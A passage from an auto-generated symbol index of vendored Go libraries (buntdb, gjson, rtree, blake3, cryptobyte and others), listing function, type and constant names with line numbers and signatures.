*Tx) Descend(index string, method DescendGreaterThan (line 1718) | func (tx *Tx) DescendGreaterThan(index, pivot string, method DescendLessOrEqual (line 1729) | func (tx *Tx) DescendLessOrEqual(index, pivot string, method DescendRange (line 1740) | func (tx *Tx) DescendRange(index, lessOrEqual, greaterThan string, method AscendEqual (line 1753) | func (tx *Tx) AscendEqual(index, pivot string, method DescendEqual (line 1781) | func (tx *Tx) DescendEqual(index, pivot string, method Nearby (line 1821) | func (tx *Tx) Nearby(index, bounds string, method Intersects (line 1859) | func (tx *Tx) Intersects(index, bounds string, method Len (line 1892) | func (tx *Tx) Len() (int, error) { method CreateIndex (line 1922) | func (tx *Tx) CreateIndex(name, pattern string, method CreateIndexOptions (line 1929) | func (tx *Tx) CreateIndexOptions(name, pattern string, method CreateSpatialIndex (line 1949) | func (tx *Tx) CreateSpatialIndex(name, pattern string, method CreateSpatialIndexOptions (line 1956) | func (tx *Tx) CreateSpatialIndexOptions(name, pattern string, method createIndex (line 1963) | func (tx *Tx) createIndex(name string, pattern string, method DropIndex (line 2037) | func (tx *Tx) DropIndex(name string) error { method Indexes (line 2068) | func (tx *Tx) Indexes() ([]string, error) { type txWriteContext (line 1009) | type txWriteContext struct type dbItemOpts (line 1201) | type dbItemOpts struct type dbItem (line 1205) | type dbItem struct method writeSetTo (line 1228) | func (dbi *dbItem) writeSetTo(buf []byte) []byte { method writeDeleteTo (line 1247) | func (dbi *dbItem) writeDeleteTo(buf []byte) []byte { method expired (line 1256) | func (dbi *dbItem) expired() bool { method expiresAt (line 1267) | func (dbi *dbItem) expiresAt() time.Time { method Less (line 1279) | func (dbi *dbItem) Less(item btree.Item, ctx interface{}) bool { method Rect (line 1312) | func (dbi *dbItem) Rect(ctx interface{}) (min, max []float64) { function appendArray (line 1211) | func appendArray(buf []byte, count int) []byte { function appendBulkString (line 1218) | func appendBulkString(buf []byte, s string) []byte { type SetOptions (line 1321) | type SetOptions struct function Match (line 1585) | func Match(key, pattern string) bool { type rect (line 1804) | type rect struct method Rect (line 1808) | func (r *rect) Rect(ctx interface{}) (min, max []float64) { type IndexOptions (line 1901) | type IndexOptions struct function Rect (line 2083) | func Rect(min, max []float64) string { function Point (line 2090) | func Point(coords ...float64) string { function IndexRect (line 2097) | func IndexRect(a string) (min, max []float64) { function IndexString (line 2105) | func IndexString(a, b string) bool { function IndexBinary (line 2144) | func IndexBinary(a, b string) bool { function IndexInt (line 2149) | func IndexInt(a, b string) bool { function IndexUint (line 2158) | func IndexUint(a, b string) bool { function IndexFloat (line 2167) | func IndexFloat(a, b string) bool { function IndexJSON (line 2176) | func IndexJSON(path string) func(a, b string) bool { function IndexJSONCaseSensitive (line 2186) | func IndexJSONCaseSensitive(path string) func(a, b string) bool { function Desc (line 2193) | func Desc(less func(a, b string) bool) func(a, b string) bool { FILE: vendor/github.com/tidwall/gjson/gjson.go type Type (line 18) | type Type method String (line 36) | func (t Type) String() string { constant Null (line 22) | Null Type = iota constant False (line 24) | False constant Number (line 26) | Number constant String (line 28) | String constant True (line 30) | True constant JSON (line 32) | JSON type Result (line 56) | type Result struct method String (line 73) | func (t Result) String() string { method Bool (line 104) | func (t Result) Bool() bool { method Int (line 119) | func (t Result) Int() int64 { method Uint (line 145) | func (t Result) Uint() uint64 { method Float (line 171) | func (t Result) Float() float64 { method Time (line 186) | func (t Result) Time() time.Time { method Array (line 196) | func (t Result) Array() []Result { method IsObject (line 208) | func (t Result) IsObject() bool { method IsArray (line 213) | func (t Result) IsArray() bool { method IsBool (line 218) | func (t Result) IsBool() bool { method ForEach (line 228) | func (t Result) ForEach(iterator func(key, value Result) bool) { method Map (line 307) | func (t Result) Map() map[string]Result { method Get (line 317) | func (t Result) Get(path string) Result { method arrayOrMap (line 337) | func (t Result) arrayOrMap(vc byte, valueize bool) (r arrayOrMapResult) { method Exists (line 652) | func (t Result) Exists() bool { method Value (line 666) | func (t Result) Value() interface{} { method Less (line 2070) | func (t Result) Less(token Result, caseSensitive bool) bool { method Paths (line 3150) | func (t Result) Paths(json string) []string { method Path (line 3167) | func (t Result) Path(json string) string { type arrayOrMapResult (line 329) | type arrayOrMapResult struct function Parse (line 465) | func Parse(json string) Result { function ParseBytes (line 514) | func ParseBytes(json []byte) Result { function squash (line 518) | func squash(json string) string { function tonum (line 571) | func tonum(json string) (raw string, num float64) { function tolit (line 594) | func tolit(json string) (raw string) { function tostr (line 603) | func tostr(json string) (raw string, str string) { function parseString (line 690) | func parseString(json string, i int) (int, string, bool, bool) { function parseNumber (line 728) | func parseNumber(json string, i int) (int, string) { function parseLiteral (line 740) | func parseLiteral(json string, i int) (int, string) { type arrayPathResult (line 751) | type arrayPathResult struct function parseArrayPath (line 769) | func parseArrayPath(path string) (r arrayPathResult) { function parseQuery (line 843) | func parseQuery(query string) ( function trim (line 925) | func trim(s string) string { function isDotPiperChar (line 940) | func isDotPiperChar(c byte) bool { type objectPathResult (line 944) | type objectPathResult struct function parseObjectPath (line 953) | func parseObjectPath(path string) (r objectPathResult) { function parseSquash (line 1021) | func parseSquash(json string, i int) (int, string) { function parseObject (line 1069) | func parseObject(c *parseContext, i int, path string) (int, bool) { function matchLimit (line 1235) | func matchLimit(str, pattern string) bool { function queryMatches (line 1240) | func queryMatches(rp *arrayPathResult, value Result) bool { function parseArray (line 1322) | func parseArray(c *parseContext, i int, path string) (int, bool) { function splitPossiblePipe (line 1631) | func splitPossiblePipe(path string) (left, right string, ok bool) { function ForEachLine (line 1716) | func ForEachLine(json string, iterator func(line Result) bool) { type subSelector (line 1730) | type subSelector struct function parseSubSelectors (line 1739) | func parseSubSelectors(path string) (sels []subSelector, out string, ok ... function nameOfLast (line 1800) | func nameOfLast(path string) string { function isSimpleName (line 1814) | func isSimpleName(component string) bool { function appendJSONString (line 1827) | func appendJSONString(dst []byte, s string) []byte { type parseContext (line 1840) | type parseContext struct function Get (line 1882) | func Get(json, path string) Result { function GetBytes (line 1995) | func GetBytes(json []byte, path string) Result { function runeit (line 2000) | func runeit(json string) rune { function unescape (line 2006) | func unescape(json string) string { function stringLessInsensitive (line 2089) | func stringLessInsensitive(a, b string) bool { function parseAny (line 2129) | func parseAny(json string, i int, hit bool) (int, Result, bool) { function GetMany (line 2207) | func GetMany(json string, path ...string) []Result { function GetManyBytes (line 2218) | func GetManyBytes(json []byte, path ...string) []Result { function validpayload (line 2226) | func validpayload(data []byte, i int) (outi int, ok bool) { function validany (line 2249) | func validany(data []byte, i int) (outi int, ok bool) { function validobject (line 2274) | func validobject(data []byte, i int) (outi int, ok bool) { function validcolon (line 2316) | func validcolon(data []byte, i int) (outi int, ok bool) { function validcomma (line 2329) | func validcomma(data []byte, i int, end byte) (outi int, ok bool) { function validarray (line 2344) | func validarray(data []byte, i int) (outi int, ok bool) { function validstring (line 2367) | func validstring(data []byte, i int) (outi int, ok bool) { function validnumber (line 2399) | func validnumber(data []byte, i int) (outi int, ok bool) { function validtrue (line 2474) | func validtrue(data []byte, i int) (outi int, ok bool) { function validfalse (line 2481) | func validfalse(data []byte, i int) (outi int, ok bool) { function validnull (line 2488) | func validnull(data []byte, i int) (outi int, ok bool) { function Valid (line 2503) | func Valid(json string) bool { function ValidBytes (line 2517) | func ValidBytes(json []byte) bool { function parseUint (line 2522) | func parseUint(s string) (n uint64, ok bool) { function parseInt (line 2537) | func parseInt(s string) (n int64, ok bool) { function safeInt (line 2562) | func safeInt(f float64) (n int64, ok bool) { function execStatic (line 2573) | func execStatic(json, path string) (pathOut, res string, ok bool) { function execModifier (line 2605) | func execModifier(json, path string) (pathOut, res string, ok bool) { function unwrap (line 2656) | func unwrap(json string) string { function AddModifier (line 2685) | func AddModifier(name string, fn func(json, arg string) string) { function ModifierExists (line 2690) | func ModifierExists(name string, fn func(json, arg string) string) bool { function cleanWS (line 2696) | func cleanWS(s string) string { function modPretty (line 2716) | func modPretty(json, arg string) string { function modThis (line 2738) | func modThis(json, arg string) string { function modUgly (line 2743) | func modUgly(json, arg string) string { function modReverse (line 2748) | func modReverse(json, arg string) string { function modFlatten (line 2794) | func modFlatten(json, arg string) string { function modKeys (line 2838) | func modKeys(json, arg string) string { function modValues (line 2865) | func modValues(json, arg string) string { function modJoin (line 2895) | func modJoin(json, arg string) string { function modValid (line 2958) | func modValid(json, arg string) string { function modFromStr (line 2967) | func modFromStr(json, arg string) string { function modToStr (line 2976) | func modToStr(str, arg string) string { function modGroup (line 2981) | func modGroup(json, arg string) string { type stringHeader (line 3017) | type stringHeader struct type sliceHeader (line 3023) | type sliceHeader struct function getBytes (line 3032) | func getBytes(json []byte, path string) Result { function fillIndex (line 3079) | func fillIndex(json string, c *parseContext) { function stringBytes (line 3090) | func stringBytes(s string) []byte { function bytesString (line 3098) | func bytesString(b []byte) string { function revSquash (line 3102) | func revSquash(json string) string { function isSafePathKeyChar (line 3251) | func isSafePathKeyChar(c byte) bool { function escapeComp (line 3259) | func escapeComp(comp string) string { FILE: vendor/github.com/tidwall/grect/grect.go type Rect (line 10) | type Rect struct method String (line 14) | func (r Rect) String() string { function normalize (line 45) | func normalize(min, max []float64) (nmin, nmax []float64) { function Get (line 72) | func Get(s string) Rect { function getRect (line 100) | func getRect(s string, i int) (min, max []float64, ri int) { function union (line 139) | func union(min1, max1, min2, max2 []float64) (umin, umax []float64) { function getWKT (line 165) | func getWKT(s string, i int) (min, max []float64, ri int) { function getWKTAny (line 185) | func getWKTAny(s string, i int) (min, max []float64, ri int) { function getWKTGeometryCollection (line 231) | func getWKTGeometryCollection(s string, i int) (min, max []float64, ri i... function getGeoJSON (line 283) | func getGeoJSON(s string, i int) (min, max []float64, ri int) { function getMinMaxBrackets (line 304) | func getMinMaxBrackets(s string) (min, max []float64) { FILE: vendor/github.com/tidwall/match/match.go function Match (line 20) | func Match(str, pattern string) bool { function MatchLimit (line 36) | func MatchLimit(str, pattern string, maxcomp int) (matched, stopped bool) { type result (line 48) | type result constant rNoMatch (line 51) | rNoMatch result = iota constant rMatch (line 52) | rMatch constant rStop (line 53) | rStop function match (line 56) | func match(str, pat string, slen int, counter *int, maxcomp int) result { function matchTrimSuffix (line 153) | func matchTrimSuffix(str, pat string) (string, string, bool) { function Allowable (line 190) | func Allowable(pattern string) (min, max string) { function IsPattern (line 230) | func IsPattern(str string) bool { FILE: vendor/github.com/tidwall/pretty/pretty.go type Options (line 11) | type Options struct function Pretty (line 31) | func Pretty(json []byte) []byte { return PrettyOptions(json, nil) } function PrettyOptions (line 34) | func PrettyOptions(json []byte, opts *Options) []byte { function Ugly (line 53) | func Ugly(json []byte) []byte { function UglyInPlace (line 62) | func UglyInPlace(json []byte) []byte { return ugly(json, json) } function ugly (line 64) | func ugly(dst, src []byte) []byte { function isNaNOrInf (line 90) | func isNaNOrInf(src []byte) bool { function appendPrettyAny (line 98) | func appendPrettyAny(buf, json []byte, i int, pretty bool, width int, pr... type pair (line 128) | type pair struct type byKeyVal (line 133) | type byKeyVal struct method Len (line 140) | func (arr *byKeyVal) Len() int { method Less (line 143) | func (arr *byKeyVal) Less(i, j int) bool { method Swap (line 152) | func (arr *byKeyVal) Swap(i, j int) { method isLess (line 195) | func (arr *byKeyVal) isLess(i, j int, kind byKind) bool { type byKind (line 157) | type byKind constant byKey (line 160) | byKey byKind = 0 constant byVal (line 161) | byVal byKind = 1 type jtype (line 164) | type jtype constant jnull (line 167) | jnull jtype = iota constant jfalse (line 168) | jfalse constant jnumber (line 169) | jnumber constant jstring (line 170) | jstring constant jtrue (line 171) | jtrue constant jjson (line 172) | jjson function getjtype (line 175) | func getjtype(v []byte) jtype { function parsestr (line 234) | func parsestr(s []byte) []byte { function appendPrettyObject (line 248) | func appendPrettyObject(buf, json []byte, i int, open, close byte, prett... function sortPairs (line 348) | func sortPairs(json, buf []byte, pairs []pair) []byte { function appendPrettyString (line 370) | func appendPrettyString(buf, json []byte, i, nl int) ([]byte, int, int, ... function appendPrettyNumber (line 393) | func appendPrettyNumber(buf, json []byte, i, nl int) ([]byte, int, int, ... function appendTabs (line 404) | func appendTabs(buf []byte, prefix, indent string, tabs int) []byte { type Style (line 421) | type Style struct function hexp (line 428) | func hexp(p byte) byte { function init (line 440) | func init() { function Color (line 463) | func Color(src []byte, style *Style) []byte { function Spec (line 596) | func Spec(src []byte) []byte { function SpecInPlace (line 602) | func SpecInPlace(src []byte) []byte { function spec (line 606) | func spec(src, dst []byte) []byte { FILE: vendor/github.com/tidwall/rtree/base/knn.go type queueItem (line 7) | type queueItem struct method Less (line 13) | func (item *queueItem) Less(b tinyqueue.Item) bool { method KNN (line 18) | func (tr *RTree) KNN(min, max []float64, center bool, iter func(item int... function boxDistRect (line 59) | func boxDistRect(a, b *treeNode) float64 { function boxDistPoint (line 81) | func boxDistPoint(point []float64, childBox *treeNode) float64 { function axisDist (line 90) | func axisDist(k, min, max float64) float64 { FILE: vendor/github.com/tidwall/rtree/base/load.go method Load (line 6) | func (tr *RTree) Load(mins, maxs [][]float64, items []interface{}) { method omt (line 67) | func (tr *RTree) omt(fitems []*treeNode, h, axis int) *treeNode { FILE: vendor/github.com/tidwall/rtree/base/rtree.go type treeNode (line 12) | type treeNode struct method unsafeItem (line 20) | func (node *treeNode) unsafeItem() *treeItem { method extend (line 43) | func (node *treeNode) extend(b *treeNode) { method area (line 54) | func (node *treeNode) area() float64 { method enlargedAreaAxis (line 62) | func (node *treeNode) enlargedAreaAxis(b *treeNode, axis int) float64 { method enlargedArea (line 77) | func (node *treeNode) enlargedArea(b *treeNode) float64 { method intersectionAreaAxis (line 85) | func (node *treeNode) intersectionAreaAxis(b *treeNode, axis int) floa... method intersectionArea (line 102) | func (node *treeNode) intersectionArea(b *treeNode) float64 { method margin (line 109) | func (node *treeNode) margin() float64 { method overlaps (line 125) | func (node *treeNode) overlaps(b *treeNode) result { method intersects (line 143) | func (node *treeNode) intersects(b *treeNode) bool { method findItem (line 152) | func (node *treeNode) findItem(item interface{}) int { method contains (line 161) | func (node *treeNode) contains(b *treeNode) bool { method childCount (line 170) | func (node *treeNode) childCount() int { type result (line 117) | type result constant not (line 120) | not result = 0 constant intersects (line 121) | intersects result = 1 constant contains (line 122) | contains result = 2 type treeItem (line 181) | type treeItem struct method unsafeNode (line 186) | func (item *treeItem) unsafeNode() *treeNode { type RTree (line 191) | type RTree struct method createNode (line 24) | func (tr *RTree) createNode(children []*treeNode) *treeNode { method Insert (line 219) | func (tr *RTree) Insert(min, max []float64, item interface{}) { method insert (line 230) | func (tr *RTree) insert(bbox *treeNode, item interface{}, level int, i... method adjustParentBBoxes (line 258) | func (tr *RTree) adjustParentBBoxes(bbox *treeNode, path []*treeNode, ... method chooseSubtree (line 265) | func (tr *RTree) chooseSubtree(bbox, node *treeNode, level int, path [... method split (line 302) | func (tr *RTree) split(insertPath []*treeNode, level int) []*treeNode { method chooseSplitIndex (line 329) | func (tr *RTree) chooseSplitIndex(node *treeNode, m, M int) int { method calcBBox (line 363) | func (tr *RTree) calcBBox(node *treeNode) { method chooseSplitAxis (line 366) | func (tr *RTree) chooseSplitAxis(node *treeNode, m, M int) { method splitRoot (line 380) | func (tr *RTree) splitRoot(node, newNode *treeNode) { method distBBox (line 386) | func (tr *RTree) distBBox(node *treeNode, k, p int, destNode *treeNode... method allDistMargin (line 404) | func (tr *RTree) allDistMargin(node *treeNode, m, M int, axis int) flo... method sortNodes (line 436) | func (tr *RTree) sortNodes(node *treeNode, axis int) { method Search (line 459) | func (tr *RTree) Search(min, max []float64, iter func(item interface{}... method search (line 467) | func (tr *RTree) search(node, bbox *treeNode, iter func(item interface... method IsEmpty (line 493) | func (tr *RTree) IsEmpty() bool { method Remove (line 503) | func (tr *RTree) Remove(min, max []float64, item interface{}) { method remove (line 508) | func (tr *RTree) remove(bbox *treeNode, item interface{}) { method condense (line 567) | func (tr *RTree) condense(path []*treeNode) { method Count (line 596) | func (tr *RTree) Count() int { method Traverse (line 601) | func (tr *RTree) Traverse(iter func(min, max []float64, level int, ite... method traverse (line 605) | func (tr *RTree) traverse(node *treeNode, iter func(min, max []float64... method Scan (line 628) | func (tr *RTree) Scan(iter func(item interface{}) bool) bool { method Bounds (line 652) | func (tr *RTree) Bounds() (min, max []float64) { method Complexity (line 661) | func (tr *RTree) Complexity() float64 { function New (line 205) | func New(dims, maxEntries int) *RTree { function sortByAxis (line 440) | func sortByAxis(items []*treeNode, axis int) { function scan (line 632) | func scan(node *treeNode, iter func(item interface{}) bool) bool { FILE: vendor/github.com/tidwall/rtree/rtree.go type Iterator (line 10) | type Iterator type Item (line 11) | type Item interface type RTree (line 15) | type RTree struct method Insert (line 33) | func (tr *RTree) Insert(item Item) { method Remove (line 60) | func (tr *RTree) Remove(item Item) { method Reset (line 88) | func (tr *RTree) Reset() { method Count (line 94) | func (tr *RTree) Count() int { method Search (line 104) | func (tr *RTree) Search(bounds Item, iter Iterator) { method KNN (line 153) | func (tr *RTree) KNN(bounds Item, center bool, iter func(item Item, di... function New (line 23) | func New(ctx interface{}) *RTree { function search (line 130) | func search(btr *base.RTree, min, max []float64, dims int, iter Iterator... function knn (line 257) | func knn(btr *base.RTree, min, max []float64, center bool, dims int, ite... FILE: vendor/github.com/tidwall/tinyqueue/tinyqueue.go type Queue (line 3) | type Queue struct method Push (line 25) | func (q *Queue) Push(item Item) { method Pop (line 30) | func (q *Queue) Pop() Item { method Peek (line 43) | func (q *Queue) Peek() Item { method Len (line 49) | func (q *Queue) Len() int { method down (line 52) | func (q *Queue) down(pos int) { method up (line 73) | func (q *Queue) up(pos int) { type Item (line 8) | type Item interface function New (line 12) | func New(data []Item) *Queue { FILE: vendor/github.com/zeebo/blake3/api.go type Hasher (line 12) | type Hasher struct method Write (line 88) | func (h *Hasher) Write(p []byte) (int, error) { method WriteString (line 94) | func (h *Hasher) WriteString(p string) (int, error) { method Reset (line 101) | func (h *Hasher) Reset() { method Clone (line 108) | func (h *Hasher) Clone() *Hasher { method Size (line 114) | func (h *Hasher) Size() int { method BlockSize (line 120) | func (h *Hasher) BlockSize() int { method Sum (line 126) | func (h *Hasher) Sum(b []byte) []byte { method Digest (line 139) | func (h *Hasher) Digest() *Digest { function New (line 20) | func New() *Hasher { function NewKeyed (line 33) | func NewKeyed(key []byte) (*Hasher, error) { function DeriveKey (line 56) | func DeriveKey(context string, material []byte, out []byte) { function NewDeriveKey (line 66) | func NewDeriveKey(context string) *Hasher { function Sum256 (line 146) | func Sum256(data []byte) (sum [32]byte) { function Sum512 (line 153) | func Sum512(data []byte) (sum [64]byte) { FILE: vendor/github.com/zeebo/blake3/blake3.go type hasher (line 16) | type hasher struct method reset (line 25) | func (a *hasher) reset() { method update (line 33) | func (a *hasher) update(buf []byte) { method updateString (line 38) | func (a *hasher) updateString(buf string) { method consume (line 61) | func (a *hasher) consume(input *[8192]byte) { method finalize (line 68) | func (a *hasher) finalize(p []byte) { method finalizeDigest (line 74) | func (a *hasher) finalizeDigest(d *Digest) { type cvstack (line 146) | type cvstack struct method pushN (line 154) | func (a *cvstack) pushN(l uint8, cv *chainVector, n int, flags uint32,... method pushL (line 163) | func (a *cvstack) pushL(l uint8, cv *chainVector, n int) { method flush (line 178) | func (a *cvstack) flush(flags uint32, key *[8]uint32) { function copyChain (line 194) | func copyChain(in *chainVector, icol int, out *chainVector, ocol int) { function readChain (line 212) | func readChain(in *chainVector, col int, out *[8]uint32) { function writeChain (line 229) | func writeChain(in *[8]uint32, out *chainVector, col int) { function compressAll (line 250) | func compressAll(d *Digest, in []byte, flags uint32, key [8]uint32) { FILE: vendor/github.com/zeebo/blake3/digest.go type Digest (line 15) | type Digest struct method Read (line 27) | func (d *Digest) Read(p []byte) (n int, err error) { method Seek (line 61) | func (d *Digest) Seek(offset int64, whence int) (int64, error) { method setPosition (line 78) | func (d *Digest) setPosition(pos uint64) { method slowCopy (line 84) | func (d *Digest) slowCopy(p []byte) (n int) { method fillBuf (line 96) | func (d *Digest) fillBuf() { FILE: vendor/github.com/zeebo/blake3/internal/alg/alg.go function HashF (line 8) | func HashF(input *[8192]byte, length, counter uint64, flags uint32, key ... function HashP (line 12) | func HashP(left, right *[64]uint32, flags uint32, key *[8]uint32, out *[... function Compress (line 16) | func Compress(chain *[8]uint32, block *[16]uint32, counter uint64, blen ... FILE: vendor/github.com/zeebo/blake3/internal/alg/compress/compress.go function Compress (line 9) | func Compress(chain *[8]uint32, block *[16]uint32, counter uint64, blen ... FILE: vendor/github.com/zeebo/blake3/internal/alg/compress/compress_pure/compress.go function Compress (line 9) | func Compress( function g (line 28) | func g(a, b, c, d, mx, my uint32) (uint32, uint32, uint32, uint32) { function rcompress (line 40) | func rcompress(s *[16]uint32, m *[16]uint32) { FILE: vendor/github.com/zeebo/blake3/internal/alg/compress/compress_sse41/impl_other.go function Compress (line 8) | func Compress(chain *[8]uint32, block *[16]uint32, counter uint64, blen ... FILE: vendor/github.com/zeebo/blake3/internal/alg/compress/compress_sse41/stubs.go function Compress (line 7) | func Compress(chain *[8]uint32, block *[16]uint32, counter uint64, blen ... FILE: vendor/github.com/zeebo/blake3/internal/alg/hash/hash.go function HashF (line 9) | func HashF(input *[8192]byte, length, counter uint64, flags uint32, key ... function HashP (line 17) | func HashP(left, right *[64]uint32, flags uint32, key *[8]uint32, out *[... FILE: vendor/github.com/zeebo/blake3/internal/alg/hash/hash_avx2/impl_other.go function HashF (line 8) | func HashF(input *[8192]byte, length, counter uint64, flags uint32, key ... function HashP (line 12) | func HashP(left, right *[64]uint32, flags uint32, key *[8]uint32, out *[... FILE: vendor/github.com/zeebo/blake3/internal/alg/hash/hash_avx2/stubs.go function HashF (line 7) | func HashF(input *[8192]byte, length, counter uint64, flags uint32, key ... function HashP (line 10) | func HashP(left, right *[64]uint32, flags uint32, key *[8]uint32, out *[... FILE: vendor/github.com/zeebo/blake3/internal/alg/hash/hash_pure/hashf.go function HashF (line 11) | func HashF(input *[8192]byte, length, counter uint64, flags uint32, key ... FILE: vendor/github.com/zeebo/blake3/internal/alg/hash/hash_pure/hashp.go function HashP (line 5) | func HashP(left, right *[64]uint32, flags uint32, key *[8]uint32, out *[... FILE: vendor/github.com/zeebo/blake3/internal/consts/consts.go constant IV0 (line 6) | IV0 = 0x6A09E667 constant IV1 (line 7) | IV1 = 0xBB67AE85 constant IV2 (line 8) | IV2 = 0x3C6EF372 constant IV3 (line 9) | IV3 = 0xA54FF53A constant IV4 (line 10) | IV4 = 0x510E527F constant IV5 (line 11) | IV5 = 0x9B05688C constant IV6 (line 12) | IV6 = 0x1F83D9AB constant IV7 (line 13) | IV7 = 0x5BE0CD19 constant Flag_ChunkStart (line 17) | Flag_ChunkStart uint32 = 1 << 0 constant Flag_ChunkEnd (line 18) | Flag_ChunkEnd uint32 = 1 << 1 constant Flag_Parent (line 19) | Flag_Parent uint32 = 1 << 2 constant Flag_Root (line 20) | Flag_Root uint32 = 1 << 3 constant Flag_Keyed (line 21) | Flag_Keyed uint32 = 1 << 4 constant Flag_DeriveKeyContext (line 22) | Flag_DeriveKeyContext uint32 = 1 << 5 constant Flag_DeriveKeyMaterial (line 23) | Flag_DeriveKeyMaterial uint32 = 1 << 6 constant BlockLen (line 27) | BlockLen = 64 constant ChunkLen (line 28) | ChunkLen = 1024 FILE: vendor/github.com/zeebo/blake3/internal/consts/cpu_little.go constant OptimizeLittleEndian (line 6) | OptimizeLittleEndian = true FILE: vendor/github.com/zeebo/blake3/internal/consts/cpu_other.go constant OptimizeLittleEndian (line 6) | OptimizeLittleEndian = false FILE: vendor/github.com/zeebo/blake3/internal/utils/utils.go function SliceToArray32 (line 8) | func SliceToArray32(bytes []byte) *[32]uint8 { return (*[32]uint8)(unsaf... function SliceToArray64 (line 9) | func SliceToArray64(bytes []byte) *[64]uint8 { return (*[64]uint8)(unsaf... function BytesToWords (line 11) | func BytesToWords(bytes *[64]uint8, words *[16]uint32) { function WordsToBytes (line 30) | func WordsToBytes(words *[16]uint32, bytes []byte) { function KeyFromBytes (line 50) | func KeyFromBytes(key []byte, out *[8]uint32) { FILE: vendor/golang.org/x/crypto/cryptobyte/asn1.go method AddASN1Int64 (line 22) | func (b *Builder) AddASN1Int64(v int64) { method AddASN1Int64WithTag (line 28) | func (b *Builder) AddASN1Int64WithTag(v int64, tag asn1.Tag) { method AddASN1Enum (line 33) | func (b *Builder) AddASN1Enum(v int64) { method addASN1Signed (line 37) | func (b *Builder) addASN1Signed(tag asn1.Tag, v int64) { method AddASN1Uint64 (line 52) | func (b *Builder) AddASN1Uint64(v uint64) { method AddASN1BigInt (line 67) | func (b *Builder) AddASN1BigInt(n *big.Int) { method AddASN1OctetString (line 101) | func (b *Builder) AddASN1OctetString(bytes []byte) { constant generalizedTimeFormatStr (line 107) | generalizedTimeFormatStr = "20060102150405Z0700" method AddASN1GeneralizedTime (line 110) | func (b *Builder) AddASN1GeneralizedTime(t time.Time) { method AddASN1UTCTime (line 121) | func (b *Builder) AddASN1UTCTime(t time.Time) { method AddASN1BitString (line 135) | func (b *Builder) AddASN1BitString(data []byte) { method addBase128Int (line 142) | func (b *Builder) addBase128Int(n int64) { function isValidOID (line 163) | func isValidOID(oid encoding_asn1.ObjectIdentifier) bool { method AddASN1ObjectIdentifier (line 181) | func (b *Builder) AddASN1ObjectIdentifier(oid encoding_asn1.ObjectIdenti... method AddASN1Boolean (line 195) | func (b *Builder) AddASN1Boolean(v bool) { method AddASN1NULL (line 205) | func (b *Builder) AddASN1NULL() { method MarshalASN1 (line 211) | func (b *Builder) MarshalASN1(v interface{}) { method AddASN1 (line 230) | func (b *Builder) AddASN1(tag asn1.Tag, f BuilderContinuation) { method ReadASN1Boolean (line 249) | func (s *String) ReadASN1Boolean(out *bool) bool { method ReadASN1Integer (line 273) | func (s *String) ReadASN1Integer(out interface{}) bool { function checkASN1Integer (line 298) | func checkASN1Integer(bytes []byte) bool { method readASN1BigInt (line 315) | func (s *String) readASN1BigInt(out *big.Int) bool { method readASN1Bytes (line 335) | func (s *String) readASN1Bytes(out *[]byte) bool { method readASN1Int64 (line 350) | func (s *String) readASN1Int64(out *int64) bool { function asn1Signed (line 358) | func asn1Signed(out *int64, n []byte) bool { method readASN1Uint64 (line 373) | func (s *String) readASN1Uint64(out *uint64) bool { function asn1Unsigned (line 381) | func asn1Unsigned(out *uint64, n []byte) bool { method ReadASN1Int64WithTag (line 401) | func (s *String) ReadASN1Int64WithTag(out *int64, tag asn1.Tag) bool { method ReadASN1Enum (line 408) | func (s *String) ReadASN1Enum(out *int) bool { method readBase128Int (line 421) | func (s *String) readBase128Int(out *int) bool { method ReadASN1ObjectIdentifier (line 453) | func (s *String) ReadASN1ObjectIdentifier(out *encoding_asn1.ObjectIdent... method ReadASN1GeneralizedTime (line 492) | func (s *String) ReadASN1GeneralizedTime(out *time.Time) bool { constant defaultUTCTimeFormatStr (line 509) | defaultUTCTimeFormatStr = "060102150405Z0700" method ReadASN1UTCTime (line 513) | func (s *String) ReadASN1UTCTime(out *time.Time) bool { method ReadASN1BitString (line 550) | func (s *String) ReadASN1BitString(out *encoding_asn1.BitString) bool { method ReadASN1BitStringAsBytes (line 573) | func (s *String) ReadASN1BitStringAsBytes(out *[]byte) bool { method ReadASN1Bytes (line 590) | func (s *String) ReadASN1Bytes(out *[]byte, tag asn1.Tag) bool { method ReadASN1 (line 599) | func (s *String) ReadASN1(out *String, tag asn1.Tag) bool { method ReadASN1Element (line 612) | func (s *String) ReadASN1Element(out *String, tag asn1.Tag) bool { method ReadAnyASN1 (line 625) | func (s *String) ReadAnyASN1(out *String, outTag *asn1.Tag) bool { method ReadAnyASN1Element (line 634) | func (s *String) ReadAnyASN1Element(out *String, outTag *asn1.Tag) bool { method PeekASN1Tag (line 640) | func (s String) PeekASN1Tag(tag asn1.Tag) bool { method SkipASN1 (line 649) | func (s *String) SkipASN1(tag asn1.Tag) bool { method ReadOptionalASN1 (line 658) | func (s *String) ReadOptionalASN1(out *String, outPresent *bool, tag asn... method SkipOptionalASN1 (line 671) | func (s *String) SkipOptionalASN1(tag asn1.Tag) bool { method ReadOptionalASN1Integer (line 683) | func (s *String) ReadOptionalASN1Integer(out interface{}, tag asn1.Tag, ... method ReadOptionalASN1OctetString (line 715) | func (s *String) ReadOptionalASN1OctetString(out *[]byte, outPresent *bo... method ReadOptionalASN1Boolean (line 740) | func (s *String) ReadOptionalASN1Boolean(out *bool, tag asn1.Tag, defaul... method readASN1 (line 755) | func (s *String) readASN1(out *String, outTag *asn1.Tag, skipHeader bool... FILE: vendor/golang.org/x/crypto/cryptobyte/asn1/asn1.go type Tag (line 15) | type Tag method Constructed (line 23) | func (t Tag) Constructed() Tag { return t | classConstructed } method ContextSpecific (line 26) | func (t Tag) ContextSpecific() Tag { return t | classContextSpecific } constant classConstructed (line 18) | classConstructed = 0x20 constant classContextSpecific (line 19) | classContextSpecific = 0x80 constant BOOLEAN (line 30) | BOOLEAN = Tag(1) constant INTEGER (line 31) | INTEGER = Tag(2) constant BIT_STRING (line 32) | BIT_STRING = Tag(3) constant OCTET_STRING (line 33) | OCTET_STRING = Tag(4) constant NULL (line 34) | NULL = Tag(5) constant OBJECT_IDENTIFIER (line 35) | OBJECT_IDENTIFIER = Tag(6) constant ENUM (line 36) | ENUM = Tag(10) constant UTF8String (line 37) | UTF8String = Tag(12) constant SEQUENCE (line 38) | SEQUENCE = Tag(16 | classConstructed) constant SET (line 39) | SET = Tag(17 | classConstructed) constant PrintableString (line 40) | PrintableString = Tag(19) constant T61String (line 41) | T61String = Tag(20) constant IA5String (line 42) | IA5String = Tag(22) constant UTCTime (line 43) | UTCTime = Tag(23) constant GeneralizedTime (line 44) | GeneralizedTime = Tag(24) constant GeneralString (line 45) | GeneralString = Tag(27) FILE: vendor/golang.org/x/crypto/cryptobyte/builder.go type Builder (line 